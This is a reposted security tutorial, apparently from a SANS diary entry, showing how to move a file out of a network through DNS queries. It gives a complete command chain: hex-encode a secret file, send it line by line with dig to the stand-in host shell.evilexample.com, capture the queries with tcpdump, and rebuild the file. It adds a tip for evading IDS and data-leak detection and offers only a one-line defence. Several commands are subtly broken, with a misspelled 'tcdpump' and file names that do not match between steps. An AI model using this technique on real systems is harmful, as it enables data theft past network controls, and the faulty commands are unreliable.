Here is an FTDNS example (File Transfer via DNS) from Johannes B. Ullrich, Ph.D. (http://isc.sans.edu/diary.html?storyid=10306):
File transfer via DNS
For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.
First, we convert the file to be transferred via xxd into a hex stream.
xxd -p secret > file.hex
next, we read each line from file.hex, and “transmit” it as a DNS query.
for b in `cat file.hex `; do dig $b.shell.evilexample.com; done
This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.
tcdpump -w /tmp/dns -s0 port 53 and host system.example.com
Then, we extract the messages from the packet capture
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
The “uniq” may not be necessary, but I find that the DNS messages may be resend once in a while if the response isn’t fast enough.
Finally, just reverse the hex encoding:
xxd -r -p < receivedu.txt > keys.pgp
And you are done! FTDNS (File Transfer via DNS) without installing any special tools on “system.example.com”
Bonus: shorter lines from xxd and maybe a quick xor may make it even harder for an IDS/Data Leakage system to “see” this kind of data.
Defense: Watch you DNS logs!
[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html
[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf
——
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter